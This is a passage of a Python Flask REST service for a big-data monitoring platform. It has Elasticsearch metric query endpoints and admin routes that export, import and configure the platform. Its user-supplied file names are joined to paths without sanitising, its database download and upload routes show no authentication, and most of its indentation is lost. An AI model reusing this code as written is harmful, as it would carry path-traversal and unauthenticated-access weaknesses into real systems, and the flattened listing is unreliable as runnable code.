            app.logger.warn('[%s] : [WARN] Unsupported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
        if request.json is None:
            response = jsonify({'Status': 'Empty payload',
                                'Message': 'Request has empty payload'})
            response.status_code = 417
            app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
                             datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
            return response
        if 'queryString' not in request.json['DMON']:
            response = jsonify({'Status': 'No queryString',
                                'Message': 'Query string not found in payload'})
            response.status_code = 404
            app.logger.error('[%s] : [ERROR] Empty queryString received for query, returned error 404',
                             datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
            return response
        if ftype == 'oslc' and 'collectd' not in request.json['DMON']['queryString']:
            response = jsonify({'Status': 'Unsupported query',
                                'Message': 'Only system metrics supported for oslc'})
            response.status_code = 409
            return response
if 'tstop' not in request.json['DMON']:
query = queryConstructor(tstart=request.json['DMON']['tstart'],
queryString=request.json['DMON']['queryString'],
size=request.json['DMON']['size'], ordering=request.json['DMON']['ordering'])
else:
query = queryConstructor(tstart=request.json['DMON']['tstart'], tstop=request.json['DMON']['tstop'],
queryString=request.json['DMON']['queryString'], size=request.json['DMON']['size'],
ordering=request.json['DMON']['ordering'])
if 'index' not in request.json['DMON']:
myIndex = 'logstash-*'
else:
myIndex = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Index set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), myIndex)
if not 'metrics' in request.json['DMON'] or request.json['DMON']['metrics'] == " ":
try:
ListMetrics, resJson = queryESCore(query, debug=False, myIndex=myIndex)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot connect to ES instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Connection error',
'Message': 'ES unreachable'})
response.status_code = 404
return response
if not ListMetrics:
response = jsonify({'Status': 'No results found',
'Message': 'Please check time interval and index'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No results found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output' + '.csv'
dict2CSV(ListMetrics)
else:
fileName = request.json['DMON']['fname'] + '.csv'
dict2CSV(ListMetrics, request.json['DMON']['fname'])
csvOut = os.path.join(outDir, fileName)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
response = jsonify({'DMON': resJson})
response.status_code = 200
return response
if ftype == 'plain':
return Response(str(ListMetrics), status=200, mimetype='text/plain')
if ftype == 'oslc':
# queryStr = request.json['DMON']['queryString']
resOSLC = jsonToPerfMon(resJson)
return Response(resOSLC, mimetype='application/rdf+xml')
else:
metrics = request.json['DMON']['metrics']
app.logger.info('[%s] : [INFO] Metrics filter set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(metrics))
try:
ListMetrics, resJson = queryESCore(query, allm=False, dMetrics=metrics, debug=False, myIndex=myIndex)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot connect to ES instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Connection error',
'Message': 'ES unreachable'})
response.status_code = 404
return response
if not ListMetrics:
response = jsonify({'Status': 'No results found!'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No results found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
            # TODO: duplicated from the branch above; refactor into a helper function
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output' + '.csv'
dict2CSV(ListMetrics)
else:
fileName = request.json['DMON']['fname'] + '.csv'
dict2CSV(ListMetrics, request.json['DMON']['fname'])
csvOut = os.path.join(outDir, fileName)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
response = jsonify({'DMON': resJson})
response.status_code = 200
return response
if ftype == 'plain':
return Response(str(ListMetrics), status=200, mimetype='text/plain')
if ftype == 'oslc':
# queryStr = request.json['DMON']['queryString']
resOSLC = jsonToPerfMon(resJson)
return Response(resOSLC, mimetype='application/rdf+xml')
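# /v2 query endpoint: aggregated metrics (system, yarn, storm, spark, cassandra, mongodb)
# computed through the QueryEngine and returned as json or csv.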
@dmon.route('/v2/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsEnhancedCore(Resource):
@api.expect(dDMONQueryEnh)
def post(self, ftype):
supportType = ["csv", "json"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
            app.logger.warn('[%s] : [WARN] Unsupported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if request.json is None:
response = jsonify({'Status': 'Empty payload',
'Message': 'Request has empty payload'})
response.status_code = 417
app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'aggregation' not in request.json['DMON']:
response = jsonify({'Status': 'Missing aggregation', 'Message': 'Aggregation must be defined'})
response.status_code = 400
app.logger.error('[%s] : [ERROR] Query missing aggregation field',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
        supportedAggregation = ['system', 'yarn', 'spark', 'storm', 'cassandra', 'mongodb']
        if request.json['DMON']['aggregation'] not in supportedAggregation:
            response = jsonify({'Supported aggregation': supportedAggregation, "Submitted Type": request.json['DMON']['aggregation']})
            response.status_code = 415
            app.logger.warn('[%s] : [WARN] Unsupported aggregation %s',
                            datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), request.json['DMON']['aggregation'])
return response
if 'index' not in request.json['DMON']:
index = 'logstash-*'
else:
index = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Using index %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), index)
if 'size' not in request.json['DMON']:
size = 0
else:
size = request.json['DMON']['size']
app.logger.info('[%s] : [INFO] Using size %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), size)
        if 'tstop' not in request.json['DMON'] or 'tstart' not in request.json['DMON']:
response = jsonify({'Status': 'Missing time interval declaration', 'Message': 'Both tstart and tstop must be defined'})
response.status_code = 400
app.logger.error('[%s] : [ERROR] Time interval not defined properly in request -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(request.json))
return response
if 'interval' not in request.json['DMON']:
interval = '10s'
else:
interval = request.json['DMON']['interval']
app.logger.info('[%s] : [INFO] Interval set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), interval)
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'Not found', 'Message': 'No es Core instance registered'})
response.status_code = 503
app.logger.info('[%s] : [INFO] ES core instance not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dqengine = QueryEngine(qES.hostIP)
qNode = dbNodes.query.all()
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nodeList = []
for nodes in qNode:
nodeList.append(nodes.nodeFQDN)
if request.json['DMON']['aggregation'] == 'system':
            # getSystemMetrics(nodes, tfrom, to, qsize, qinterval, index)
            df_system = dqengine.getSystemMetrics(nodeList, request.json['DMON']['tstart'], request.json['DMON']['tstop'], int(size), interval, index)
            if isinstance(df_system, int):
                response = jsonify({'Status': 'error', 'Message': 'response is null'})
                response.status_code = 500
                app.logger.error('[%s] : [ERROR] System metrics query returned no results',
                                 datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
                return response
            df_system.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_system))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_system, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'yarn':
df_dfs = dqengine.getDFS(request.json['DMON']['tstart'], request.json['DMON']['tstop'], int(size),
interval, index)
df_cluster = dqengine.getCluster(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
df_name_node = dqengine.getNameNode(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
nm_merged, jvmnn_merged, shuffle_merged = dqengine.getNodeManager(nodeList, request.json['DMON']['tstart'],
request.json['DMON']['tstop'], int(size),
interval, index)
df_dn_merged = dqengine.getDataNode(nodeList, request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
listDF = [df_dfs, df_cluster, df_name_node, nm_merged, jvmnn_merged, shuffle_merged, df_dn_merged]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'storm':
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
                app.logger.warning('[%s] : [WARN] No LS instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info(
'[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort,
qSCore.LSCoreStormTopology)
                app.logger.info('[%s] : [INFO] Storm topology %s with %s spouts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
df_storm = dqengine.getStormMetrics(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index, bolts=bolts, spouts=spouts)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_storm))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_storm, csvOut)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'spark':
return "Not for this version"
if request.json['DMON']['aggregation'] == 'cassandra':
df_CA_Count, df_CA_Gauge = dqengine.getCassandraMetrics(nodeList, request.json['DMON']['tstart'],
request.json['DMON']['tstop'], int(size), interval, index)
            if isinstance(df_CA_Count, int) or isinstance(df_CA_Gauge, int):
response = jsonify({'Status': 'Empty response for cassandra metrics'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Empty response detected for Cassandra',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
listDF = [df_CA_Count, df_CA_Gauge]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'mongodb':
df_MD_Count, df_MD_Gauge = dqengine.getMongoMetrics(nodeList, request.json['DMON']['tstart'],
                                                                request.json['DMON']['tstop'], int(size), interval, index)
if isinstance(df_MD_Count, int) or isinstance(df_MD_Gauge, int):
response = jsonify({'Status': 'Empty response for MongoDB metrics'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Empty response detected for MongoDB',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
listDF = [df_MD_Count, df_MD_Gauge]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
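# /v3 query endpoint: same payload as /v1 but executed asynchronously; a background worker
# writes the result to the output directory and the query/worker IDs are returned immediately.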
@dmon.route('/v3/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsAsyncEnhancedCore(Resource):
@api.expect(dMONQuery) # this is for payload
def post(self, ftype):
# args = pQueryES.parse_args()#parsing query arguments in URI
supportType = ["csv", "json", "plain", "oslc"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
            app.logger.warn('[%s] : [WARN] Unsupported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
        if request.json is None:
            response = jsonify({'Status': 'Empty payload',
                                'Message': 'Request has empty payload'})
            response.status_code = 417
            app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
                             datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
            return response
        if 'queryString' not in request.json['DMON']:
            response = jsonify({'Status': 'No queryString',
                                'Message': 'Query string not found in payload'})
            response.status_code = 404
            app.logger.error('[%s] : [ERROR] Empty queryString received for query, returned error 404',
                             datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
            return response
        if ftype == 'oslc' and 'collectd' not in request.json['DMON']['queryString']:
            response = jsonify({'Status': 'Unsupported query',
                                'Message': 'Only system metrics supported for oslc'})
            response.status_code = 409
            return response
if 'tstop' not in request.json['DMON']:
query = queryConstructor(tstart=request.json['DMON']['tstart'],
queryString=request.json['DMON']['queryString'],
size=request.json['DMON']['size'], ordering=request.json['DMON']['ordering'])
else:
query = queryConstructor(tstart=request.json['DMON']['tstart'], tstop=request.json['DMON']['tstop'],
queryString=request.json['DMON']['queryString'], size=request.json['DMON']['size'],
ordering=request.json['DMON']['ordering'])
if 'index' not in request.json['DMON']:
myIndex = 'logstash-*'
else:
myIndex = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Index set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), myIndex)
if 'fname' not in request.json['DMON']:
fname = "%s.%s" %(str(uuid.uuid4())[:8], ftype)
else:
fname = "%s.%s" %(request.json['DMON']['fname'], ftype)
if os.path.isfile(os.path.join(outDir, fname)):
app.logger.warning('[%s] : [WARN] Duplicate query id detected, query with the id %s already exists!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fname)
message = 'Query with id %s already exists' %fname
response = jsonify({'Status': 'Query conflict', 'Message': message})
response.status_code = 409
return response
for proc in gbgProcessList:
try:
if not proc['process'].is_alive():
gbgProcessList.remove(proc)
app.logger.info('[%s] : [INFO] Process %s with PID %s inactive, removed from process list!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), proc['uuid'], proc['pid'])
except Exception as inst:
                app.logger.warning('[%s] : [WARN] Checking process failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), str(inst.args))
        AsyncQueryWorkers = int(os.getenv('DMON_WORKERS', 50))
        if len(gbgProcessList) > AsyncQueryWorkers:
            app.logger.warning('[%s] : [WARN] Maximum number (%s) of query workers exceeded!',
                               datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(AsyncQueryWorkers))
            message = 'Maximum number of query workers %s' % str(AsyncQueryWorkers)
            response = jsonify({'Status': 'Too many query workers', 'Message': message})
response.status_code = 429
return response
backProc = multiprocessing.Process(target=asyncQuery, args=(request, query, myIndex, ftype, fname,))
backProc.daemon = True
backProc.start()
start_time = time.time()
fuuid = fname.split('.')[0]
tuuid = fname.split('.')[1]
procdist = {'process': backProc, 'uuid': fuuid, 'pid': backProc.pid, 'start': start_time, 'OutputType': tuuid}
if not checkPID(backProc.pid):
response = jsonify({'Status': 'Worker Fail', 'Message': 'Failed to start query worker'})
response.status_code = 500
return response
gbgProcessList.append(procdist)
response = jsonify({'QueryID': fuuid, 'WorkerID': backProc.pid, 'Start': start_time, 'OutputType': tuuid})
response.status_code = 201
return response
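# Lists the asynchronous query output files currently available in the output directory,
# optionally filtered by output type ('all' lists every type; tar archives are skipped).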
@dmon.route('/v3/observer/query/<ftype>/async/list')
class QueryEsAsyncEnhancedCoreList(Resource):
def get(self, ftype):
supportType = ["csv", "json", "plain", "oslc", "all"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
            app.logger.warn('[%s] : [WARN] Unsupported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if ftype == 'all':
outputFile = '*.*'
else:
outputFile = '*.%s' %ftype
lFile = []
for name in glob.glob(os.path.join(outDir, outputFile)):
path, filename = os.path.split(name)
if "tar" in filename:
pass
else:
lFile.append(filename)
response = jsonify({'Output': lFile})
response.status_code = 200
app.logger.info('[%s] : [INFO] Available output files %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lFile))
return response
@dmon.route('/v3/observer/query/<ftype>/async/<nfile>')
class QueryEsAsyncEnhancedCoreSpecific(Resource):
def get(self, ftype, nfile):
supportType = ["csv", "json", "plain", "oslc", "all"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
            app.logger.warn('[%s] : [WARN] Unsupported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
fileName = "%s.%s" %(nfile, ftype)
filepath = os.path.join(outDir, fileName)
app.logger.info('[%s] : [INFO] File name %s, file path %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile, filepath)
if not os.path.isfile(filepath):
app.logger.warn('[%s] : [WARN] No output %s found of type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile, ftype)
response = jsonify({'Status': 'Env Warning', 'Message': 'No output found', 'OutputName': fileName})
response.status_code = 404
return response
fileName = "%s.%s" %(nfile, ftype)
filePath = os.path.join(outDir, fileName)
if not os.path.isfile(filePath):
app.logger.warning('[%s] : [WARN] Query %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fileName)
response = jsonify({'Status': 'Not Available', 'QueryOut': fileName})
response.status_code = 404
return response
if ftype == 'csv':
app.logger.info('[%s] : [INFO] Exported query %s to csv',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
            return send_file(filePath, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
with open(filePath) as data_file:
data = json.load(data_file)
app.logger.info('[%s] : [INFO] Exported query %s to JSON',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
response = jsonify({'DMON': data})
response.status_code = 200
return response
if ftype == 'plain':
with open(filePath, 'r') as data_file:
data = data_file.read()
            app.logger.info('[%s] : [INFO] Exported query %s to plain text',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
return Response(data, status=200, mimetype='text/plain')
if ftype == 'oslc':
with open(filePath, 'r') as data_file:
data = data_file.read()
app.logger.info('[%s] : [INFO] Exported query %s to OSLC',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
return Response(data, mimetype='application/rdf+xml')
@dmon.route('/v3/observer/query/active')
class QueryEsAsyncEnhancedCoreActive(Resource):
def get(self):
alive = []
for proc in gbgProcessList:
procDetail = {}
if proc['process'].is_alive():
procDetail['QueryID'] = proc['uuid']
procDetail['OutputType'] = proc['OutputType']
procDetail['Start'] = proc['start']
procDetail['WorkerID'] = proc['pid']
alive.append(procDetail)
response = jsonify(alive)
response.status_code = 200
return response
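# Overlord endpoints: administrative resources for the monitoring platform (framework
# configuration templates, application registration, core services and node management).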
@dmon.route('/v1/overlord')
class OverlordInfo(Resource):
def get(self):
response = jsonify({'Status': 'Current version is 0.2.4'})
response.status_code = 200
return response
@dmon.route('/v1/overlord/framework')
class OverlordFrameworkInfo(Resource):
def get(self):
response = jsonify({'Supported Frameworks': lFrameworks})
response.status_code = 200
return response
@dmon.route('/v1/overlord/framework/<fwork>')
@api.doc(params={'fwork': 'Big Data framework name'})
class OverlordFrameworkProperties(Resource):
def get(self, fwork):
if fwork not in lFrameworks:
response = jsonify({'Status': 'Malformed URI', 'Message': 'Unknown framework ' + fwork})
response.status_code = 404
            app.logger.warning('[%s] : [WARN] Malformed URI, unknown framework %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fwork)
return response
if fwork == 'hdfs' or fwork == 'yarn':
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propYarnTmp = os.path.join(tmpDir, 'metrics/hadoop-metrics2.tmp')
propYarnFile = os.path.join(cfgDir, 'hadoop-metrics2.properties')
try:
template = templateEnv.get_template(propYarnTmp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.yarnMet
infoYarn = {'metrics2_period': period}
            propYarnInfo = template.render(infoYarn)
            propYarnConf = open(propYarnFile, "w+")
            propYarnConf.write(propYarnInfo)
propYarnConf.close()
try:
propCfg = open(propYarnFile, 'r')
except EnvironmentError:
response = jsonify({'Status': 'Environment Error!', 'Message': 'File not Found!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN/HDFS properties file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(propCfg, mimetype='text/x-java-properties', as_attachment=True)
if fwork == 'spark':
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propSparkTemp = os.path.join(tmpDir, 'metrics/spark-metrics.tmp')
propSparkFile = os.path.join(cfgDir, 'metrics.properties')
try:
template = templateEnv.get_template(propSparkTemp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Spark template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSCore = dbSCore.query.first() # TODO: Only works for single deployment
if qLSCore is None:
response = jsonify({'Status': 'Missing Instance', 'Message': 'No Logstash Instance Configured'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No Logstash server instance configured',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.sparkMet
infoSpark = {'logstashserverip': qLSCore.hostIP, 'logstashportgraphite': '5002', 'period': period}
propSparkInfo = template.render(infoSpark)
propSparkConf = open(propSparkFile, "w+")
propSparkConf.write(propSparkInfo)
propSparkConf.close()
rSparkProp = open(propSparkFile, 'r')
return send_file(rSparkProp, mimetype='text/x-java-properties',
as_attachment=True) # TODO: Swagger returns same content each time, however sent file is correct
if fwork == 'cassandra':
return "Cassandra conf" #todo
if fwork == 'mongodb':
return "mongodb conf"
@dmon.route('/v1/overlord/application/<appID>')
@api.doc(params={'appID': 'Application identification'})
class OverlordAppSubmit(Resource):
def put(self, appID):
startT = datetime.utcnow()
qApp = dbApp.query.filter_by(appName=appID).first()
if qApp is None:
# Sort by id desc
lastApp = db.session.query(dbApp.id, dbApp.appName).order_by(dbApp.id.desc()).first()
if lastApp is None:
                app.logger.info('[%s] : [INFO] No previous application registered', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
                # Get id of last inserted app; ordering is based on how lastApp is declared; [0] -> dbApp.id
app.logger.info('[%s] : [INFO] Last registered applications id %s name %s, setting to inactive',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), lastApp[0],
lastApp[1])
qlastApp = dbApp.query.filter_by(appName=lastApp[1]).first()
qlastApp.stopTime = startT
qlastApp.jobID = 'STOPPED'
db.session.add(qlastApp)
appl = dbApp(appName=appID, appVersion=1, jobID='ACTIVE', startTime=startT, stopTime=None)
db.session.add(appl)
app.logger.info('[%s] : [INFO] Added new application %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appID)
response = jsonify({'Status': 'Registered Application', 'App': appID, 'Start': startT})
response.status_code = 201
else:
newVer = int(qApp.appVersion) + 1
qApp.appVersion = newVer
qApp.startTime = startT
            # check if it is marked as active; if not, set it active and mark the previously active app as inactive
app.logger.info('[%s] : [INFO] Application %s has status %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qApp.appName, qApp.jobID)
if qApp.jobID == 'ACTIVE':
pass
else:
qApp.jobID = 'ACTIVE'
                qActive = dbApp.query.filter_by(jobID='ACTIVE').first()
                if qActive is not None:
                    app.logger.info('[%s] : [INFO] Found other active application %s',
                                    datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qActive.appName)
                    qActive.jobID = 'STOPPED'
db.session.add(qApp)
response = jsonify({'Status': 'Modified', 'App': appID, 'Version': qApp.appVersion})
app.logger.info('[%s] : [INFO] Modified application %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appID)
response.status_code = 200
return response
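# Core management endpoints: bootstrap/halt stubs, database download/upload and the
# aggregated status of the ES, Logstash and Kibana core services.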
@dmon.route('/v1/overlord/core')
class OverlordBootstrap(Resource):
def post(self):
return "Deploys all monitoring core components with default configuration"
@dmon.route('/v1/overlord/core/halt')
class OverlordCoreHalt(Resource):
def post(self):
return "Stop all core components!"
@dmon.route('/v1/overlord/core/database')
class OverlordCoredb(Resource):
def get(self):
try:
dbFile = open(os.path.join(baseDir, 'dmon.db'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
            app.logger.error('[%s] : [ERROR] Database not found',
                             datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(dbFile, mimetype='application/x-sqlite3', as_attachment=True)
def put(self):
dbLoc = os.path.join(baseDir, 'dmon.db')
file = request.files['dmon.db']
if os.path.isfile(os.path.join(baseDir, 'dmon.db')) is True:
os.rename(dbLoc, dbLoc + '.backup')
app.logger.info('[%s] : [INFO] Old database backup created',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
